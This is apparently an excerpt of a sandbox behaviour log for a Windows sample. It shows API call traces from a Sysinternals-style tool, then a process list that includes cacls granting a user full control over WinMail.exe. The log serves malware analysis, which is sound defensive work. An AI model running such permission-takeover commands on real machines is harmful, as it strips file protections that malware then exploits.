\x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9fH\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02h\x02(\x02(\x02(\x02(\x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02 \x02H\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x84\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x81\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x01\x03\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x10\x02\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x82\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x02\x03\x10\x02\x10\x02\x10\x02\x10\x02 \x02", lpUsedDefaultChar=0x0) returned 256 [0234.296] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x8, Size=0x100) returned 0x2f12f0 [0234.296] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x140010890) returned 0x0 [0234.297] RtlSizeHeap (HeapHandle=0x2d0000, Flags=0x0, MemoryPointer=0x2f12f0) returned 0x100 [0234.297] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77940000 [0234.297] GetProcAddress (hModule=0x77940000, lpProcName="IsWow64Process") returned 0x779491d0 [0234.297] GetCurrentProcess () returned 0xffffffffffffffff [0234.297] IsWow64Process (in: hProcess=0xffffffffffffffff, Wow64Process=0x12fef0 | out: Wow64Process=0x12fef0) returned 1 [0234.298] GetLastError () returned 0x0 [0234.298] SetLastError (dwErrCode=0x0) [0234.298] GetLastError () returned 0x0 [0234.298] SetLastError (dwErrCode=0x0) [0234.298] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x0) returned 0x2 [0234.298] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x78) returned 0x0 [0234.299] RegQueryValueExW (in: hKey=0x78, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x0, lpcbData=0x12fc48*=0x4) returned 0x2 [0234.299] RegCloseKey (hKey=0x78) returned 0x0 [0234.299] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", ulOptions=0x0, samDesired=0x101, phkResult=0x12fc10 | out: phkResult=0x12fc10*=0x78) returned 0x0 [0234.299] RegQueryValueExW (in: hKey=0x78, lpValueName="EulaAccepted", lpReserved=0x0, lpType=0x0, lpData=0x12fc40, lpcbData=0x12fc48*=0x4 | out: lpType=0x0, lpData=0x12fc40*=0x1, lpcbData=0x12fc48*=0x4) returned 0x0 [0234.299] RegCloseKey (hKey=0x78) returned 0x0 [0234.299] GetLastError () returned 0x0 [0234.299] SetLastError (dwErrCode=0x0) [0234.299] GetLastError () returned 0x0 [0234.299] SetLastError (dwErrCode=0x0) [0234.299] RegCreateKeyW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Sysinternals\\Handle", phkResult=0x12fc38 | out: phkResult=0x12fc38*=0x78) returned 0x0 [0234.300] RegSetValueExW (in: hKey=0x78, lpValueName="EulaAccepted", Reserved=0x0, dwType=0x4, lpData=0x12fc30*=0x1, cbData=0x4 | out: lpData=0x12fc30*=0x1) returned 0x0 [0234.300] RegCloseKey (hKey=0x78) returned 0x0 [0234.300] GetLastError () returned 0x0 [0234.300] SetLastError (dwErrCode=0x0) [0234.300] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x1000) returned 0x2f2430 [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.301] SetLastError (dwErrCode=0x0) [0234.301] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.302] SetLastError (dwErrCode=0x0) [0234.302] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.303] GetLastError () returned 0x0 [0234.303] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.304] SetLastError (dwErrCode=0x0) [0234.304] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.305] SetLastError (dwErrCode=0x0) [0234.305] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.306] SetLastError (dwErrCode=0x0) [0234.306] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.307] SetLastError (dwErrCode=0x0) [0234.307] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.308] GetLastError () returned 0x0 [0234.308] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.309] SetLastError (dwErrCode=0x0) [0234.309] GetLastError () returned 0x0 [0234.310] SetLastError (dwErrCode=0x0) [0234.311] GetLastError () returned 0x0 [0234.311] SetLastError (dwErrCode=0x0) [0234.311] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e2b4 | out: lpMode=0x12e2b4) returned 1 [0234.311] WriteFile (in: hFile=0x7, lpBuffer=0x12e980*, nNumberOfBytesToWrite=0x65, lpNumberOfBytesWritten=0x12e2a0, lpOverlapped=0x0 | out: lpBuffer=0x12e980*, lpNumberOfBytesWritten=0x12e2a0*=0x65, lpOverlapped=0x0) returned 1 [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.314] GetLastError () returned 0x0 [0234.314] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.315] SetLastError (dwErrCode=0x0) [0234.315] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.316] SetLastError (dwErrCode=0x0) [0234.316] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.317] GetLastError () returned 0x0 [0234.317] SetLastError (dwErrCode=0x0) [0234.318] GetLastError () returned 0x0 [0234.318] SetLastError (dwErrCode=0x0) [0234.318] GetLastError () returned 0x0 [0234.318] SetLastError (dwErrCode=0x0) [0234.318] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e2b4 | out: lpMode=0x12e2b4) returned 1 [0234.716] WriteFile (in: hFile=0x7, lpBuffer=0x12e980*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x12e2a0, lpOverlapped=0x0 | out: lpBuffer=0x12e980*, lpNumberOfBytesWritten=0x12e2a0*=0x2c, lpOverlapped=0x0) returned 1 [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.718] GetLastError () returned 0x0 [0234.718] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.719] GetLastError () returned 0x0 [0234.719] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.720] GetLastError () returned 0x0 [0234.720] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.721] SetLastError (dwErrCode=0x0) [0234.721] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.722] GetLastError () returned 0x0 [0234.722] SetLastError (dwErrCode=0x0) [0234.723] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x12e2b4 | out: lpMode=0x12e2b4) returned 1 [0234.723] WriteFile (in: hFile=0x7, lpBuffer=0x12e980*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x12e2a0, lpOverlapped=0x0 | out: lpBuffer=0x12e980*, lpNumberOfBytesWritten=0x12e2a0*=0x3a, lpOverlapped=0x0) returned 1 [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.725] SetLastError (dwErrCode=0x0) [0234.725] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.726] GetLastError () returned 0x0 [0234.726] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.727] SetLastError (dwErrCode=0x0) [0234.727] GetLastError () returned 0x0 [0234.728] SetLastError (dwErrCode=0x0) [0234.728] GetLastError () returned 0x0 [0234.728] SetLastError (dwErrCode=0x0) [0234.728] GetLastError () returned 0x0 [0234.728] SetLastError (dwErrCode=0x0) [0234.728] GetLastError () returned 0x0 [0234.728] SetLastError (dwErrCode=0x0) [0234.728] GetLastError () returned 0x0 [0234.728] SetLastError (dwErrCode=0x0) [0234.728] GetLastError () returned 0x0 [0234.729] SetLastError (dwErrCode=0x0) [0234.753] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f00b0 | out: hHeap=0x2d0000) returned 1 [0234.753] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x12fe58 | out: phModule=0x12fe58) returned 0 [0234.753] RtlExitUserProcess (ExitCode=0x1) [0234.753] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2ef080 | out: hHeap=0x2d0000) returned 1 Process: id = "249" image_name = "cacls.exe" filename = "c:\\windows\\syswow64\\cacls.exe" page_root = "0x27e27000" os_pid = "0xa30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "234" os_parent_pid = "0x7c4" cmd_line = "cacls \"C:\\Program Files\\Windows Mail\\WinMail.exe\" /E /G 5p5NrGJn0jS HALPmcxz:F /C" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 853 os_tid = 0x74c Process: id = "250" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x28b59000" os_pid = "0x4e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "34" os_parent_pid = "0x184" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 854 os_tid = 0x130 Thread: id = 860 os_tid = 0xa24 Thread: id = 865 os_tid = 0xb68 Process: id = "251" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x28b1e000" os_pid = "0xaf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" 